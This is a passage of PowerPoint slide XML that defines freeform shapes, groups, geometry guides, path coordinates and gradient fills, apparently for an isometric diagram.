                  <a:gd name="T3" fmla="*/ 97 h 217"/>
                  <a:gd name="T4" fmla="*/ 449 w 449"/>
                  <a:gd name="T5" fmla="*/ 217 h 217"/>
                  <a:gd name="T6" fmla="*/ 449 w 449"/>
                  <a:gd name="T7" fmla="*/ 120 h 217"/>
                  <a:gd name="T8" fmla="*/ 0 w 449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9" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="449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3" name="Freeform 1466"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1104" y="-1174"/>
                <a:ext cx="1344" cy="458"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1344"/>
                  <a:gd name="T1" fmla="*/ 458 h 458"/>
                  <a:gd name="T2" fmla="*/ 0 w 1344"/>
                  <a:gd name="T3" fmla="*/ 361 h 458"/>
                  <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T5" fmla="*/ 0 h 458"/>
                  <a:gd name="T6" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T7" fmla="*/ 97 h 458"/>
                  <a:gd name="T8" fmla="*/ 0 w 1344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458"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="458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354" name="Freeform 1152"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="7017919" y="2997111"/>
              <a:ext cx="1444576" cy="386940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55" name="Freeform 1054"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="4762451" y="3602757"/>
              <a:ext cx="1444576" cy="388062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56" name="Group 1449"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="5783076" y="3590420"/>
              <a:ext cx="464328" cy="139074"/>
              <a:chOff x="-240" y="-1656"/>
              <a:chExt cx="3137" cy="940"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="357" name="Freeform 1450"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="658" y="-1656"/>
                <a:ext cx="446" cy="217"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 446"/>
                  <a:gd name="T1" fmla="*/ 0 h 217"/>
                  <a:gd name="T2" fmla="*/ 0 w 446"/>
                  <a:gd name="T3" fmla="*/ 97 h 217"/>
                  <a:gd name="T4" fmla="*/ 446 w 446"/>
                  <a:gd name="T5" fmla="*/ 217 h 217"/>
                  <a:gd name="T6" fmla="*/ 446 w 446"/>
                  <a:gd name="T7" fmla="*/ 120 h 217"/>
                  <a:gd name="T8" fmla="*/ 0 w 446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6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6" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446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8" name="Freeform 1451"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-240" y="-1656"/>
                <a:ext cx="3137" cy="843"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2887 w 3137"/>
                  <a:gd name="T1" fmla="*/ 54 h 843"/>
                  <a:gd name="T2" fmla="*/ 898 w 3137"/>
                  <a:gd name="T3" fmla="*/ 0 h 843"/>
                  <a:gd name="T4" fmla="*/ 1344 w 3137"/>
                  <a:gd name="T5" fmla="*/ 120 h 843"/>
                  <a:gd name="T6" fmla="*/ 0 w 3137"/>
                  <a:gd name="T7" fmla="*/ 482 h 843"/>
                  <a:gd name="T8" fmla="*/ 1344 w 3137"/>
                  <a:gd name="T9" fmla="*/ 843 h 843"/>
                  <a:gd name="T10" fmla="*/ 2688 w 3137"/>
                  <a:gd name="T11" fmla="*/ 482 h 843"/>
                  <a:gd name="T12" fmla="*/ 3137 w 3137"/>
                  <a:gd name="T13" fmla="*/ 602 h 843"/>
                  <a:gd name="T14" fmla="*/ 2887 w 3137"/>
                  <a:gd name="T15" fmla="*/ 54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7" h="843">
                    <a:moveTo>
                      <a:pt x="2887" y="54"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="898" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="482"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="843"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2688" y="482"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3137" y="602"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2887" y="54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9" name="Freeform 1452"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-240" y="-1174"/>
                <a:ext cx="1344" cy="458"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1344"/>
                  <a:gd name="T1" fmla="*/ 0 h 458"/>
                  <a:gd name="T2" fmla="*/ 0 w 1344"/>
                  <a:gd name="T3" fmla="*/ 97 h 458"/>
                  <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T5" fmla="*/ 458 h 458"/>
                  <a:gd name="T6" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T7" fmla="*/ 361 h 458"/>
                  <a:gd name="T8" fmla="*/ 0 w 1344"/>
                  <a:gd name="T9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0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="458"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="3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0" name="Freeform 1453"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2448" y="-1174"/>
                <a:ext cx="449" cy="217"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 449"/>
                  <a:gd name="T1" fmla="*/ 0 h 217"/>
                  <a:gd name="T2" fmla="*/ 0 w 449"/>
                  <a:gd name="T3" fmla="*/ 97 h 217"/>
                  <a:gd name="T4" fmla="*/ 449 w 449"/>
                  <a:gd name="T5" fmla="*/ 217 h 217"/>
                  <a:gd name="T6" fmla="*/ 449 w 449"/>
                  <a:gd name="T7" fmla="*/ 120 h 217"/>
                  <a:gd name="T8" fmla="*/ 0 w 449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9" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="449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1" name="Freeform 1454"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1104" y="-1174"/>
                <a:ext cx="1344" cy="458"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1344"/>
                  <a:gd name="T1" fmla="*/ 458 h 458"/>
                  <a:gd name="T2" fmla="*/ 0 w 1344"/>
                  <a:gd name="T3" fmla="*/ 361 h 458"/>
                  <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T5" fmla="*/ 0 h 458"/>
                  <a:gd name="T6" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T7" fmla="*/ 97 h 458"/>
                  <a:gd name="T8" fmla="*/ 0 w 1344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458"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="458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362" name="Group 1455"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="6922586" y="3290962"/>
              <a:ext cx="464328" cy="139074"/>
              <a:chOff x="-240" y="-1656"/>
              <a:chExt cx="3137" cy="940"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="363" name="Freeform 1456"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="658" y="-1656"/>
                <a:ext cx="446" cy="217"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 446"/>
                  <a:gd name="T1" fmla="*/ 0 h 217"/>
                  <a:gd name="T2" fmla="*/ 0 w 446"/>
                  <a:gd name="T3" fmla="*/ 97 h 217"/>
                  <a:gd name="T4" fmla="*/ 446 w 446"/>
                  <a:gd name="T5" fmla="*/ 217 h 217"/>
                  <a:gd name="T6" fmla="*/ 446 w 446"/>
                  <a:gd name="T7" fmla="*/ 120 h 217"/>
                  <a:gd name="T8" fmla="*/ 0 w 446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6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6" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446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4" name="Freeform 1457"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-240" y="-1656"/>
                <a:ext cx="3137" cy="843"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2887 w 3137"/>
                  <a:gd name="T1" fmla="*/ 54 h 843"/>
                  <a:gd name="T2" fmla="*/ 898 w 3137"/>
                  <a:gd name="T3" fmla="*/ 0 h 843"/>
                  <a:gd name="T4" fmla="*/ 1344 w 3137"/>
                  <a:gd name="T5" fmla="*/ 120 h 843"/>
                  <a:gd name="T6" fmla="*/ 0 w 3137"/>
                  <a:gd name="T7" fmla="*/ 482 h 843"/>
                  <a:gd name="T8" fmla="*/ 1344 w 3137"/>
                  <a:gd name="T9" fmla="*/ 843 h 843"/>
                  <a:gd name="T10" fmla="*/ 2688 w 3137"/>
                  <a:gd name="T11" fmla="*/ 482 h 843"/>
                  <a:gd name="T12" fmla="*/ 3137 w 3137"/>
                  <a:gd name="T13" fmla="*/ 602 h 843"/>
                  <a:gd name="T14" fmla="*/ 2887 w 3137"/>
                  <a:gd name="T15" fmla="*/ 54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7" h="843">
                    <a:moveTo>
                      <a:pt x="2887" y="54"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="898" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="482"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="843"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2688" y="482"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3137" y="602"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2887" y="54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5" name="Freeform 1458"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-240" y="-1174"/>
                <a:ext cx="1344" cy="458"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1344"/>
                  <a:gd name="T1" fmla="*/ 0 h 458"/>
                  <a:gd name="T2" fmla="*/ 0 w 1344"/>
                  <a:gd name="T3" fmla="*/ 97 h 458"/>
                  <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T5" fmla="*/ 458 h 458"/>
                  <a:gd name="T6" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T7" fmla="*/ 361 h 458"/>
                  <a:gd name="T8" fmla="*/ 0 w 1344"/>
                  <a:gd name="T9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0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="458"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="3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6" name="Freeform 1459"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2448" y="-1174"/>
                <a:ext cx="449" cy="217"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 449"/>
                  <a:gd name="T1" fmla="*/ 0 h 217"/>
                  <a:gd name="T2" fmla="*/ 0 w 449"/>
                  <a:gd name="T3" fmla="*/ 97 h 217"/>
                  <a:gd name="T4" fmla="*/ 449 w 449"/>
                  <a:gd name="T5" fmla="*/ 217 h 217"/>
                  <a:gd name="T6" fmla="*/ 449 w 449"/>
                  <a:gd name="T7" fmla="*/ 120 h 217"/>
                  <a:gd name="T8" fmla="*/ 0 w 449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9" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="449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7" name="Freeform 1460"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1104" y="-1174"/>
                <a:ext cx="1344" cy="458"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1344"/>
                  <a:gd name="T1" fmla="*/ 458 h 458"/>
                  <a:gd name="T2" fmla="*/ 0 w 1344"/>
                  <a:gd name="T3" fmla="*/ 361 h 458"/>
                  <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T5" fmla="*/ 0 h 458"/>
                  <a:gd name="T6" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T7" fmla="*/ 97 h 458"/>
                  <a:gd name="T8" fmla="*/ 0 w 1344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458"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="458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368" name="Freeform 1115"/>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="5896353" y="3298813"/>
              <a:ext cx="1441211" cy="385819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69" name="Group 368"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1724325" y="5118787"/>
              <a:ext cx="2439033" cy="918731"/>
              <a:chOff x="304800" y="4937125"/>
              <a:chExt cx="2051050" cy="549275"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="370" name="Freeform 67"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="304800" y="4937125"/>
                <a:ext cx="2051050" cy="549275"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 161"/>
                  <a:gd name="T1" fmla="*/ 22 h 44"/>
                  <a:gd name="T2" fmla="*/ 81 w 161"/>
                  <a:gd name="T3" fmla="*/ 0 h 44"/>
                  <a:gd name="T4" fmla="*/ 161 w 161"/>
                  <a:gd name="T5" fmla="*/ 22 h 44"/>
                  <a:gd name="T6" fmla="*/ 81 w 161"/>
                  <a:gd name="T7" fmla="*/ 44 h 44"/>
                  <a:gd name="T8" fmla="*/ 0 w 161"/>
                  <a:gd name="T9" fmla="*/ 2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44">
                    <a:moveTo>
                      <a:pt x="0" y="22"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="81" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="44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2B2B2">
                      <a:gamma/>
                      <a:tint val="68627"/>
                      <a:invGamma/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="B2B2B2"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000" scaled="1"/>
              </a:gradFill>
              <a:ln w="190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71" name="Freeform 1310"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="504141" y="4997472"/>
                <a:ext cx="1631950" cy="439738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noFill/>
              <a:ln w="38100" algn="ctr">
                <a:solidFill>
                  <a:srgbClr val="2A79D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ACACA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372" name="Freeform 1054"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="8207626" y="4720391"/>
              <a:ext cx="1073534" cy="288388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73" name="Freeform 1054"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="9404414" y="4712017"/>
              <a:ext cx="1073534" cy="288388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74" name="Freeform 1054"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="7064626" y="4729935"/>
              <a:ext cx="1073534" cy="288388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75" name="Group 389"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="5805772" y="2269214"/>
              <a:ext cx="1533724" cy="444325"/>
              <a:chOff x="3051" y="2167"/>
              <a:chExt cx="1151" cy="333"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="376" name="Freeform 390"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3051" y="2167"/>
                <a:ext cx="1151" cy="309"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3583"/>
                  <a:gd name="T1" fmla="*/ 600 h 962"/>
                  <a:gd name="T2" fmla="*/ 2239 w 3583"/>
                  <a:gd name="T3" fmla="*/ 0 h 962"/>
                  <a:gd name="T4" fmla="*/ 3583 w 3583"/>
                  <a:gd name="T5" fmla="*/ 359 h 962"/>
                  <a:gd name="T6" fmla="*/ 1344 w 3583"/>
                  <a:gd name="T7" fmla="*/ 962 h 962"/>
                  <a:gd name="T8" fmla="*/ 0 w 3583"/>
                  <a:gd name="T9" fmla="*/ 600 h 9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83"/>
                  <a:gd name="T16" fmla="*/ 0 h 962"/>
                  <a:gd name="T17" fmla="*/ 3583 w 3583"/>
                  <a:gd name="T18" fmla="*/ 962 h 9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83" h="962">
                    <a:moveTo>
                      <a:pt x="0" y="600"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2239" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3583" y="359"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="962"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="600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77" name="Freeform 391"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3248" y="2374"/>
                <a:ext cx="182" cy="49"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 565"/>
                  <a:gd name="T1" fmla="*/ 121 h 152"/>
                  <a:gd name="T2" fmla="*/ 447 w 565"/>
                  <a:gd name="T3" fmla="*/ 0 h 152"/>
                  <a:gd name="T4" fmla="*/ 565 w 565"/>
                  <a:gd name="T5" fmla="*/ 31 h 152"/>
                  <a:gd name="T6" fmla="*/ 116 w 565"/>
                  <a:gd name="T7" fmla="*/ 152 h 152"/>
                  <a:gd name="T8" fmla="*/ 0 w 565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2"/>
                  <a:gd name="T17" fmla="*/ 565 w 565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2">
                    <a:moveTo>
                      <a:pt x="0" y="121"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="447" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="565" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116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78" name="Freeform 392"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3823" y="2219"/>
                <a:ext cx="182" cy="49"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 565"/>
                  <a:gd name="T1" fmla="*/ 121 h 152"/>
                  <a:gd name="T2" fmla="*/ 449 w 565"/>
                  <a:gd name="T3" fmla="*/ 0 h 152"/>
                  <a:gd name="T4" fmla="*/ 565 w 565"/>
                  <a:gd name="T5" fmla="*/ 31 h 152"/>
                  <a:gd name="T6" fmla="*/ 119 w 565"/>
                  <a:gd name="T7" fmla="*/ 152 h 152"/>
                  <a:gd name="T8" fmla="*/ 0 w 565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2"/>
                  <a:gd name="T17" fmla="*/ 565 w 565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2">
                    <a:moveTo>
                      <a:pt x="0" y="121"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="449" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="565" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119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79" name="Freeform 393"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3536" y="2297"/>
                <a:ext cx="181" cy="48"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 565"/>
                  <a:gd name="T1" fmla="*/ 121 h 152"/>
                  <a:gd name="T2" fmla="*/ 447 w 565"/>
                  <a:gd name="T3" fmla="*/ 0 h 152"/>
                  <a:gd name="T4" fmla="*/ 565 w 565"/>
                  <a:gd name="T5" fmla="*/ 31 h 152"/>
                  <a:gd name="T6" fmla="*/ 116 w 565"/>
                  <a:gd name="T7" fmla="*/ 152 h 152"/>
                  <a:gd name="T8" fmla="*/ 0 w 565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2"/>
                  <a:gd name="T17" fmla="*/ 565 w 565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2">
                    <a:moveTo>
                      <a:pt x="0" y="121"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="447" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="565" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116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0" name="Freeform 394"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3483" y="2282"/>
                <a:ext cx="719" cy="218"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 2239"/>
                  <a:gd name="T1" fmla="*/ 603 h 679"/>
                  <a:gd name="T2" fmla="*/ 2239 w 2239"/>
                  <a:gd name="T3" fmla="*/ 0 h 679"/>
                  <a:gd name="T4" fmla="*/ 2239 w 2239"/>
                  <a:gd name="T5" fmla="*/ 76 h 679"/>
                  <a:gd name="T6" fmla="*/ 0 w 2239"/>
                  <a:gd name="T7" fmla="*/ 679 h 679"/>
                  <a:gd name="T8" fmla="*/ 0 w 2239"/>
                  <a:gd name="T9" fmla="*/ 603 h 6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9"/>
                  <a:gd name="T16" fmla="*/ 0 h 679"/>
                  <a:gd name="T17" fmla="*/ 2239 w 2239"/>
                  <a:gd name="T18" fmla="*/ 679 h 67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9" h="679">
                    <a:moveTo>
                      <a:pt x="0" y="603"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2239" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2239" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="679"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="603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1" name="Freeform 395"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3051" y="2359"/>
                <a:ext cx="432" cy="141"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1344"/>
                  <a:gd name="T1" fmla="*/ 0 h 438"/>
                  <a:gd name="T2" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T3" fmla="*/ 362 h 438"/>
                  <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T5" fmla="*/ 438 h 438"/>
                  <a:gd name="T6" fmla="*/ 0 w 1344"/>
                  <a:gd name="T7" fmla="*/ 76 h 438"/>
                  <a:gd name="T8" fmla="*/ 0 w 1344"/>
                  <a:gd name="T9" fmla="*/ 0 h 4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4"/>
                  <a:gd name="T16" fmla="*/ 0 h 438"/>
                  <a:gd name="T17" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T18" fmla="*/ 438 h 4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4" h="438">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1344" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="438"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0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382" name="Group 389"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="4870313" y="2523050"/>
              <a:ext cx="1533724" cy="444325"/>
              <a:chOff x="3051" y="2167"/>
              <a:chExt cx="1151" cy="333"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="383" name="Freeform 390"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3051" y="2167"/>
                <a:ext cx="1151" cy="309"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3583"/>
                  <a:gd name="T1" fmla="*/ 600 h 962"/>
                  <a:gd name="T2" fmla="*/ 2239 w 3583"/>
                  <a:gd name="T3" fmla="*/ 0 h 962"/>
                  <a:gd name="T4" fmla="*/ 3583 w 3583"/>
                  <a:gd name="T5" fmla="*/ 359 h 962"/>
                  <a:gd name="T6" fmla="*/ 1344 w 3583"/>
                  <a:gd name="T7" fmla="*/ 962 h 962"/>
                  <a:gd name="T8" fmla="*/ 0 w 3583"/>
                  <a:gd name="T9" fmla="*/ 600 h 9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83"/>
                  <a:gd name="T16" fmla="*/ 0 h 962"/>
                  <a:gd name="T17" fmla="*/ 3583 w 3583"/>
                  <a:gd name="T18" fmla="*/ 962 h 9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83" h="962">
                    <a:moveTo>
                      <a:pt x="0" y="600"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2239" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3583" y="359"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="962"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="600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4" name="Freeform 391"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
